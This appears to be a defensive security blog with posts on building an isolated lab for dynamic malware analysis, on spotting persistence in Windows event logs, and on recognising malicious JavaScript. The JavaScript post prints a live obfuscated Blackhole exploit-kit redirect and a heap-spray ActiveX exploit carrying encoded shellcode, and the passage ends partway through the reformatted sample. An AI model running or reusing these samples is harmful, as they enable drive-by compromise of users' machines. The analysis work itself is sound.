Thursday, February 14, 2013

Dynamic Malware Analysis


When studying malware for network defense, you have two options: static or dynamic analysis.  Static analysis requires a deep understanding of executables, low-level programming and the use of specialized tools for reverse engineering.  This is generally done in a lab environment with analysts breaking down API calls and casting debugging spells that make the rest of us feel rather incompetent.  In other words, you need some serious skills for static malware analysis.  Dynamic malware analysis, on the other hand, requires only an elementary knowledge of APIs and coding, in addition to an expert-level understanding of networking and virtual environments.  In today's post, we will focus on the latter, which, while seemingly daunting, is surprisingly easy and straightforward as long as you can keep the whole thing in focus as you go about your tasks.

While Static Malware Analysis would yield the most complete understanding of a threat, most of the time, network defenders will need to know what to look for should a system be infected and what the network activity looks like.  Dynamic malware analysis provides a relatively quick and easy answer to the most important questions regarding a specific malware threat:
  • What does the malware do?
  • What is the threat that this malware presents to our environment?
  • How do I identify infected systems?
Dynamic malware analysis, as the name implies, is always changing and varies greatly.  How I do dynamic malware analysis may not be how others do it, and that's OK.  As such, I will describe one way of doing dynamic malware analysis using VMware ESXi.  The intent is to highlight some techniques for finding quick answers to these questions.

I should note that there are of course tools and scripts all over the Internet that can help you do most of these tasks.  I'm sure there might even be a whole application that can complete dynamic malware analysis without having to configure too many things.  My approach is focused on understanding what is happening and controlling as many variables as possible.  Loading some kind of malware analysis toolbox can definitely make life easier, but I feel that one should know how to do something without relying too heavily on a particular tool.  

REQUIREMENTS
As stated above, you will need a very good grasp of networking and a general understanding of APIs and how programs work.  While this can be done in a non-virtual environment, it is much easier with tools like VMware ESXi and other virtualization platforms.  As such, a clear understanding of how virtualization works is also required.

So, here's a list:
  • A hefty system that can run multiple virtual machines.
  • Several working virtual machines running the operating system that is being targeted (usually Windows).
  • Either a host running Linux (easier) or Windows (harder) or a virtual machine running the same, on the same host.
  • Snapshots of the target virtual machines in known good states.

FIRST THINGS FIRST
The first thing to set up is your sandbox.  By definition, a sandbox is where you play, but more importantly, it is isolated from your normal working environment.  If at all possible, it is best to have your sandbox or virtual machine host separated from your production network.  This is not strictly necessary, but it completely removes the possibility of releasing malware into your production environment and may even be a requirement depending on where you work.

For our purposes, we will have a VMware ESXi host running two virtual machines: a plain Windows XP system and a Linux system for analysis.  Additionally, the VMware ESXi host will have a virtual switch that is not connected to a physical network adapter.  By default, ESXi will have a virtual switch named "vSwitch0" which is connected to your physical network adapter and is also used for your management network:

Virtual Switch: vSwitch0 
--------------------------
Virtual Machine Port Group - VM Network   |<-------> vmnic0 (Physical Adapter)
VMKernel Port - Management Network (vmk0) |
Port Group Label: "VM Network"            |

Create a new virtual switch named "vSwitch1" that has no physical adapters and add a port group and call it "Malware Network":

Virtual Switch: vSwitch1 
--------------------------
Virtual Machine Port Group - Malware Network |<-------> No adapters
Port Group Label: "Malware Network"          |
VLAN ID: None                                |

Some of the settings for vSwitch1 should include:
Promiscuous Mode: Accept
MAC Address Changes: Accept

After that is set up, ensure that your virtual machines are configured to use the "Malware Network" port group on vSwitch1 instead of vSwitch0.  You should also add two network cards to your Linux system, one for the Malware Network and one for the regular network.  This allows you to do even more dynamic malware analysis by downloading malware components through your Linux system.

Windows XP
----------
Network Adapter 1 = Malware Network

Linux
-----
Network Adapter 1 = Malware Network
Network Adapter 2 = VM Network

Once this is set up, you will have a network that looks like this:

+----------+           +----------+
| Win XP   |<--------->| Linux    |<-------> NETWORK ACCESS
| Target   |           |          |
+----------+           +----------+

This gives you a lot of flexibility: you can run malware on the Windows XP target and observe the network activity on the Linux system.  Additionally, you can quickly access the network from the Linux system for things like DNS lookups and additional code and tool downloads.

THE SETUP
Windows XP is relatively easy to set up, so I won't go into detail for that.  There are tons of resources on the 'net to help with that.  Linux is also relatively easy, so grab your favorite distribution and get that installed.  There are some good software packages and configurations to load for each:

Windows
  • Sysinternals Suite (get the whole suite, just in case and install it): http://technet.microsoft.com/en-us/sysinternals/bb842062
  • Java (it's a good idea to install it, since most malware these days like it): http://www.java.com/en/download/index.jsp
  • Ollydbg (for quick looks): http://www.ollydbg.de
  • Wireshark: http://www.wireshark.org/
  • Create an administrative account with a password
  • Create a non-administrative account
  • Install/configure your network defenses*
  • DO NOT load the VMware Tools
  • Static IP address with Default Gateway and DNS server as the Linux IP address on the Malware Network.
* One thing to note: if your network defenses are up-to-snuff, you shouldn't have a lot of malware to worry about.  But this can also interfere with your dynamic malware analysis.  You may want to consider having a "non-protected" Windows VM as well as a "protected" one to see if the malware you are analyzing will work in your environment or not.  Since the focus of this post is dynamic malware analysis, we'll assume you have a "non-protected" version of Windows running in your VM.

Linux (note that most of these are built-in)
  • tcpdump (or wireshark if you like GUIs)
  • A kernel that allows routing ("Enable Routing" in most kernel configurations)
  • wget
  • netcat
  • apache (or another web server)
  • Static IP address on eth0 with the Default Gateway as the loopback address (127.0.0.1)
  • Static route on eth0 pointing to the loopback address

SNAPSHOTS 
Once you have a good configuration set up on both, take a snapshot.  A snapshot allows you to revert to a known good state, which is important between malware runs.  Over the years, I've found that I have to continually adjust my snapshots and have multiple snapshots depending on what I am doing.  There is no magic formula for this - you will have to just learn by doing and find what works best for you.  For example, I've found that having Diskmon, Process Explorer and Process Monitor running on the Windows system with established filters works for me.  Basically, if you find that you keep setting things up before running the malware on the target box, you'll want to take a snapshot with those things set up just before you load and run the malware.

Snapshots are not so critical on the Linux system, but your mileage may vary, so take one anyway.

HIDING THE HOUSE
There are breeds of malware that have virtualization detection built in, and they may or may not run depending on whether they detect a virtual environment.  If this is a concern, you can modify the .vmx file of your Windows target system and add some parameters that will essentially hide the fact that it is running in a virtual environment.  The following lines do this to some extent.  Note that there are many ways to detect a virtual environment, so this is not a 100% solution.  For particularly sensitive malware, the only solutions are to go physical or do static malware analysis.  Note that I have yet to run into this problem.

isolation.tools.getPtrLocation.disable = "TRUE"
isolation.tools.setPtrLocation.disable = "TRUE"
isolation.tools.setVersion.disable = "TRUE"
isolation.tools.getVersion.disable = "TRUE"
monitor_control.disable_directexec = "TRUE"
monitor_control.disable_chksimd = "TRUE"
monitor_control.disable_ntreloc = "TRUE"
monitor_control.disable_selfmod = "TRUE"
monitor_control.disable_reloc = "TRUE"
monitor_control.disable_btinout = "TRUE"
monitor_control.disable_btmemspace = "TRUE"
monitor_control.disable_btpriv = "TRUE"
monitor_control.disable_btseg = "TRUE"
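
As a rough illustration, the settings above could be merged into a .vmx file with a short Python helper.  This is only a sketch: harden_vmx and HIDE_SETTINGS are names made up for this example, and it assumes the usual key = "value" layout of a .vmx file.  Work on a copy of the file, with the VM powered off.

```python
# Hypothetical helper for illustration; not part of VMware's tooling.
HIDE_SETTINGS = [
    "isolation.tools.getPtrLocation.disable",
    "isolation.tools.setPtrLocation.disable",
    "isolation.tools.setVersion.disable",
    "isolation.tools.getVersion.disable",
    "monitor_control.disable_directexec",
    "monitor_control.disable_chksimd",
    "monitor_control.disable_ntreloc",
    "monitor_control.disable_selfmod",
    "monitor_control.disable_reloc",
    "monitor_control.disable_btinout",
    "monitor_control.disable_btmemspace",
    "monitor_control.disable_btpriv",
    "monitor_control.disable_btseg",
]


def harden_vmx(vmx_text):
    """Return vmx_text with every key in HIDE_SETTINGS set to "TRUE"."""
    kept = []
    for line in vmx_text.splitlines():
        key = line.split("=", 1)[0].strip()
        if key not in HIDE_SETTINGS:  # drop old values of the keys we manage
            kept.append(line)
    kept.extend('%s = "TRUE"' % key for key in HIDE_SETTINGS)
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    sample = 'displayName = "WinXP-Target"\nmonitor_control.disable_reloc = "FALSE"\n'
    print(harden_vmx(sample))
```

Existing lines are left in place, so unrelated settings in the file are not disturbed.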

LINUX SETUP
Setting up your Linux environment can vary by distribution, so here are some generalized items to set up:


  • tcpdump running constantly and saving to a file.  The idea is to capture everything for data collection and further analysis.  This should also be running in a different terminal window.
    • tcpdump -nn -i eth0 -s1600 -U -w capture.pcap
  • Another terminal window that you can use to query the capture.pcap file as needed.  For me, I like to see the packets as they come in, so in that terminal window, I run:
    • tail -f capture.pcap | tcpdump -nn -r - -vvX
  • Note that the above command should be run immediately after starting the tcpdump command.
  • Or you can bypass all the tcpdump business by simply running a GUI version of Wireshark.

TESTING ALL SYSTEMS
Once your snapshots are all set up, it's time to do some communication checks.

For this post, we'll assume the following setup:

Windows Target System
---------------------
IP: 10.0.0.1
MASK: 255.255.255.0
GATEWAY: 10.0.0.2
DNS: 10.0.0.2

Linux System (eth0)
-------------------
IP: 10.0.0.2
MASK: 255.255.255.0
GATEWAY: 127.0.0.1

First, on the Windows system, send a ping to 10.0.0.2 and observe the response.  On the Linux host, observe the incoming and response ICMP packets in Wireshark or tcpdump windows.
On the Linux system, send a ping to 10.0.0.1 and observe the outbound and response ICMP packets in Wireshark or tcpdump windows.

Next, again on the Windows system, ensure that your tools for monitoring the system (e.g. Process Monitor) are running.

FIRE THE MALWARE
On the Windows system, run the malware.  Switch over to your Linux VM and see if any network traffic was generated.  The setup above ensures that any DNS queries or connection attempts are captured in the Linux system by pointing all traffic towards the Linux VM.  The first thing you will notice is that there is a lot of traffic already captured.  This is because Windows is particularly chatty on the network.  Review the captured packets and look for any DNS queries (Wireshark filter: "udp.port eq 53") or TCP connection attempts (Wireshark filter: "tcp.flags.syn == 1").
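
If you prefer to pull the same two answers out of capture.pcap with a script, the sketch below shows one way using only the Python standard library.  It assumes a classic libpcap file (as written by tcpdump -w, not pcapng) captured on an Ethernet interface with IPv4 traffic; the function names are invented for this example.  Unlike the "tcp.flags.syn == 1" filter, it counts only the initial SYN (ACK clear), and it does not follow DNS name compression or reassemble fragments.

```python
import socket
import struct


def read_pcap(data):
    """Yield raw frames from a classic libpcap capture held in memory."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    offset = 24  # skip the global header
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(
            endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def dns_question_name(message):
    """Decode the first question name of a DNS message."""
    labels, pos = [], 12  # the DNS header is 12 bytes
    while pos < len(message) and message[pos] != 0:
        length = message[pos]
        labels.append(message[pos + 1:pos + 1 + length].decode("ascii", "replace"))
        pos += 1 + length
    return ".".join(labels)


def summarize(data):
    """Return (queried DNS names, (dst_ip, dst_port) pairs that received a SYN)."""
    queries, syns = set(), set()
    for frame in read_pcap(data):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # keep only Ethernet frames carrying IPv4
        ip = frame[14:]
        header_len = (ip[0] & 0x0F) * 4
        protocol = ip[9]
        dst_ip = socket.inet_ntoa(ip[16:20])
        l4 = ip[header_len:]
        if protocol == 17 and len(l4) >= 20:  # UDP header + DNS header
            dst_port = struct.unpack("!H", l4[2:4])[0]
            dns_flags = struct.unpack("!H", l4[10:12])[0]
            if dst_port == 53 and not (dns_flags & 0x8000):  # QR bit clear = query
                queries.add(dns_question_name(l4[8:]))
        elif protocol == 6 and len(l4) >= 14:  # TCP
            dst_port = struct.unpack("!H", l4[2:4])[0]
            if (l4[13] & 0x12) == 0x02:  # SYN set, ACK clear
                syns.add((dst_ip, dst_port))
    return queries, syns
```

On the Linux system this would be called as summarize(open("capture.pcap", "rb").read()); the two sets it returns feed directly into the steps that follow.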

What you do next depends on what happened.  First, review the network traffic.

DNS Queries - if there are DNS queries captured:
  1. Take note of the domain being resolved.
  2. Revert the Windows target system to the known good state
  3. Edit the Windows hosts file (C:\WINDOWS\SYSTEM32\drivers\etc\hosts) and add the domain to point to the Linux system.  Each entry is the IP address followed by the host name, so if the domain is "www.abc.com", add an entry to the hosts file like so: "10.0.0.2 www.abc.com"
  4. Run the malware again.
  5. Review what happens differently.
TCP Connection Attempts - if there are SYN packets to some Internet IP addresses:
  1. Take note of the IP address being attempted.
  2. Take note of the port being connected to.
  3. For example, let's assume it tried to connect to 1.2.3.4 TCP port 8080.
  4. Create the 1.2.3.4 address on the Linux VM as another loopback interface: ifconfig lo:1 inet 1.2.3.4 netmask 255.255.255.255
  5. This adds another interface (lo:1) to the system with an IP address of 1.2.3.4.
  6. Set up a netcat listener on port 8080: nc -n -l -k 8080
  7. Revert the Windows target system to the known good state
  8. Run the malware again.
  9. Review what happens differently.
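
If you would rather have the first bytes of each connection in a variable than on a netcat terminal, a small Python listener can stand in for step 6.  This is a minimal sketch; open_listener and capture_once are names chosen for this example, and the 1.2.3.4 / 8080 values are the same hypothetical ones used in the steps above.

```python
import socket


def open_listener(host, port):
    """Bind a TCP listening socket; port 0 lets the OS pick a free port."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(5)
    return server


def capture_once(server, max_bytes=4096, timeout=5.0):
    """Accept one connection and return (peer_address, first bytes received)."""
    server.settimeout(timeout)
    conn, peer = server.accept()
    with conn:
        conn.settimeout(timeout)
        try:
            data = conn.recv(max_bytes)
        except socket.timeout:
            data = b""  # the client connected but sent nothing in time
    return peer, data


if __name__ == "__main__":
    # Demo on the loopback address; on the analysis VM you would bind to
    # the aliased address instead, e.g. open_listener("1.2.3.4", 8080).
    listener = open_listener("127.0.0.1", 0)
    print("listening on port", listener.getsockname()[1])
    listener.close()
```

Ports below 1024 need root on Linux, the same as with netcat.
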
RINSE AND REPEAT
As you revert the Windows target system and run the malware, observe what happens and see if you can identify what the malware is doing by:
  • Analyzing the registry, file, and process information collected by the Sysinternals suite.
  • Reviewing the collected network traffic and identifying any second-stage downloads or command and control channels.
  • Downloading second-stage files manually by sending the exact GET request observed from the malware.
  • Rinsing and repeating with the second-stage download.

FINAL REPORT
At the end of a dynamic malware analysis task, you should know enough to identify what the malware does to the system, what it does on the network, what sort of threat it presents to your environment and how to find infected systems.  This type of information is invaluable to your incident responders.

Thanks for reading this post - I hope it was useful and helps you find your own techniques for dynamic malware analysis.  In future iterations of this topic, we'll explore ways to identify and execute malicious JavaScript safely.

Thursday, November 22, 2012

Identifying Compromise with the Windows Event Log

Windows event logs are primarily viewed as a means to confirm a compromise and explore its depth and breadth. Typically, only after having been alerted by IDS, HIDS, or AV will an incident responder examine host event logs. Until recent changes in Vista & Server 2K8, this information could be seen as unmanageable and unruly. Today, I'm advocating for the use of Windows Event Logs as a source for initial identification of security incidents, instead of an afterthought.

Detecting Persistence
I'm part of a team whose role is to perform penetration tests and design mitigative strategies based on our ability to break in, persist, and move laterally. Most of the time, when we land on a machine inside of the target network, we utilize some form of persistence mechanism:

  1. Add a registry setting to HKLM/.../Run or RunOnce
  2. Attempt to create a service which runs our trojan
  3. Add a task in TaskScheduler to execute our trojan
  4. Open the Windows Firewall, enable Remote Desktop/ Remote Assistance, and add a user
  5. Copy our trojan into the "Auto-Start" directory
Let's take a moment and analyse how each of the above actions is captured in the Windows Event Logs (thank you Randy Franklin):
  1. Event 4657: Registry Changes
  2. Event 4697: Service installed on a system
  3. Event 4698: A Scheduled Task was created
  4. Event 4946: Firewall Exception Added, Event 4720: User Created
  5. Event 4657: This action will trigger registry changes in the Run hive
Now, let's not get carried away! I mean, Windows registry changes happen A LOT on end user workstations. Looking at all of the registry changes as potential compromises would be like documenting each port scan of your external IP space - not helpful. With this in mind, we need to filter for changes to specific hives which should generally remain static. We can also watch out for changes to any of the hives examined by "AutoRuns.exe"; a tool created by Mark Russinovich to identify persistent applications in Windows. 
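
To make the filtering idea concrete, here is a small Python sketch.  It assumes events have already been exported into dictionaries with "event_id" and "object_name" fields (hypothetical field names; your collector will have its own), and that registry paths look like \REGISTRY\MACHINE\SOFTWARE\...\Run.  The watched key list is deliberately tiny; in practice it would grow to cover the locations AutoRuns checks.

```python
# Event IDs taken from the list above; descriptions are shortened.
ALWAYS_REVIEW = {
    4697: "service installed",
    4698: "scheduled task created",
    4720: "user account created",
}

# Registry keys that should rarely change on a workstation (illustrative subset).
WATCHED_KEY_SUFFIXES = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\currentversion\runonce",
)


def triage(events):
    """Return (event_id, reason) pairs worth a closer look."""
    findings = []
    for event in events:
        event_id = event.get("event_id")
        if event_id in ALWAYS_REVIEW:
            findings.append((event_id, ALWAYS_REVIEW[event_id]))
        elif event_id == 4657:
            key = event.get("object_name", "")
            # Ignore the flood of ordinary registry writes.
            if key.lower().endswith(WATCHED_KEY_SUFFIXES):
                findings.append((4657, "autostart registry key changed: " + key))
    return findings


if __name__ == "__main__":
    sample = [
        {"event_id": 4657,
         "object_name": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
        {"event_id": 4657,
         "object_name": r"\REGISTRY\USER\S-1-5-21\Software\SomeApp\Settings"},
        {"event_id": 4698},
    ]
    for finding in triage(sample):
        print(finding)
```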

Getting the Logs Together
Let's talk about the bigger challenge: collecting events from EACH workstation in a domain into a central location. There are a few approaches that would work, some more scalable than others. Your organization's bottom line will dictate what type of solution you can implement, but just collecting key events centrally is a step in the right direction. If your organization has hardware sitting around, you can implement the first 2 solutions for free (plus labor):

  • Powershell or WMI: pull specific events
    • Easy, quick, could provide spotty data depending on pull frequency
  • Event Log Forwarding: push events to central log management device
    • Built into Windows, manageable via GPO, almost real-time, encryptable
  • Splunk or Snare agent: push events to central log management device
    • Optimal, real-time, encryptable, relatively expensive 

Not Just for Persistence!
Other uses of event logs include, but are not limited to:
  • Suspicious Share usage (think pass-the-hash/psexec.exe)
  • Local administrative account creation
  • Local administrator brute force attempts
  • Use of "net" tools on non-network admin boxes
  • Suspicious internal RDP sessions

Caveat
Log management is certainly not a catch-all. Attackers can and will find ways to compromise networks that will go undetected by event log monitoring. Event log monitoring should be viewed as an essential compromise detection component of a defense-in-depth approach to network security. That being said, for an attacker to persist on a Windows machine, it is extremely likely that they will trigger an event listed above.

Thursday, November 15, 2012

Malicious JavaScript

Oftentimes, malware enters your network through your clients.  One of the most prevalent attack vectors is through browser vulnerabilities.  These usually manifest as malicious JavaScript that either redirects the browser to a malicious website hosting exploit code or is an exploit itself.  The Blackhole Exploit Kit has been making the news and flooding non-malicious but exploitable websites with redirect code through obfuscated JavaScript that will cause your web browser to be redirected through a series of other websites that determine your software versions and serve you the appropriate exploit for your system.  This is all automated and can be deployed by non-technical attackers.

But what does "obfuscated" really mean?  For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated.  As a network defender, I've encountered my share of obfuscated JavaScript.  It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietary code, etc).  This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.

LEGITIMATE CODE
There is no real substitute for experience.  If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it.  Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious.  But, we can start with the easy ones.

Yahoo and Google make up a lot of the JavaScript code out there.  jQuery, undoubtedly one of the more popular JavaScript frameworks is served straight from Google.  Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons.  Saving bandwidth and automatic updating are just some of the reasons.  Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI).  JavaScript that is served by Yahoo and Google can generally be trusted.  After reviewing several samples over the wire, it becomes easy to see the patterns.

But it is important to know that exploit kits such as the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites.  BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks.  It tends to consume only a few, albeit long, lines of code and usually has a large amount of what appear to be meaningless numbers or letters followed by a decoding sequence.  I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to them.

In short, trust some sources, but not the frameworks.

REDIRECT CODE
JavaScript that redirects will usually go through several layers of obfuscation.  The structure generally tends to look like this:

Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code

The last line, execution code, describes JavaScript execution, such as "eval" or some obfuscated version of it.  As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.

Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i
63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;689!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z);


EXPLOIT CODE
JavaScript exploits are usually Heap Spray attacks.  They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload.  There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload.  Note that this does not mean the code is not obfuscated.  It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself.  In other words, it will stick out.  

NOP SLEDS
NOP (No OPeration) is an assembly instruction that does nothing.  If an attacker has placed her payload, which contains assembly instructions, in memory, but is not sure exactly where it is in memory, she may pad the beginning of the payload with NOP instructions (0x90) so that if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP instructions until it hits the main payload.  This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.
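
When triaging scripts in bulk, a quick check for a sled at the front of an unescape() string can be scripted.  The Python sketch below is only a heuristic under a simple assumption: the sled is written as repeated %u9090 units, each of which becomes two 0x90 bytes in memory.  The function name is made up for this example.

```python
import re


def nop_sled_bytes(escaped):
    """Return how many 0x90 bytes lead an unescape()-style %uXXXX string."""
    match = re.match(r"(?:%u9090)+", escaped, re.IGNORECASE)
    if not match:
        return 0
    units = len(match.group(0)) // 6  # each "%u9090" is six characters
    return units * 2                  # and decodes to two NOP bytes


if __name__ == "__main__":
    print(nop_sled_bytes("%u9090%u9090%u9090%u54EB%u758B"))
```

A sled built from other filler bytes will not be caught by this check, so a zero result proves nothing.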

Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:

function second()

{
        var yuwergufiudf = 0x0F0F0F0F;
        var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB
%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE
%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B
%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB
%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C
%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353
%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F
%u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78
%u6870%u3F70%u6572%u3D67%u0001");
        var uyywifssdfdsf = 0x400000;
        var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2;
        var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38);
        var erwfrhhrhfg = unescape("%u0D0D%u0D0D");
        erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize);
        iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf;
        memory = new Array();
        for (i=0;i<iusdiuiudfsd;i++)
        {
                memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf;
        }
        var target = new ActiveXObject("DirectAnimation.PathControl");
        target.KeyFrame(0x40000E0A, new Array(1), new Array(1));
}

UNOBFUSCATING
The lovely thing about scripting languages is that they execute regardless of the environment.  Unlike executable malware, you can take JavaScript code and run it in any environment, as long as certain dependencies are met.  Luckily, there are a lot of tools available for doing just this.  One of my favorites is Malzilla (http://malzilla.sourceforge.net/).  Malzilla is a Windows-based tool that can not only execute JavaScript but also re-format, debug and analyze the resulting "stuff" that it generates.

Let's take the first example above of redirecting JavaScript.  First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla.  Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button.  This will give us something more readable.

 c=3-1;

 i=c-2;
 if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try
 {
   Boolean().prototype.q
 }
 catch(egewgsd)
 {
   f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i7